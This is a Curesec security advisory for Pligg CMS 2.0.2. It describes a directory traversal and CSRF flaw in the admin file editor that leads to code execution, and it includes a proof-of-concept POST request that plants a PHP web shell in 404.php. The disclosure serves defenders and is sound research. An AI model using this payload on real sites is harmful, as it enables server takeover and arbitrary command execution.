Pligg CMS 2.0.2 - Cross-Site Request Forgery / Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Code Execution & CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

The file editor provides the possibility to edit .tpl files stored in the
templates directory.

But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.

Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.

3. Proof of Concept


POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html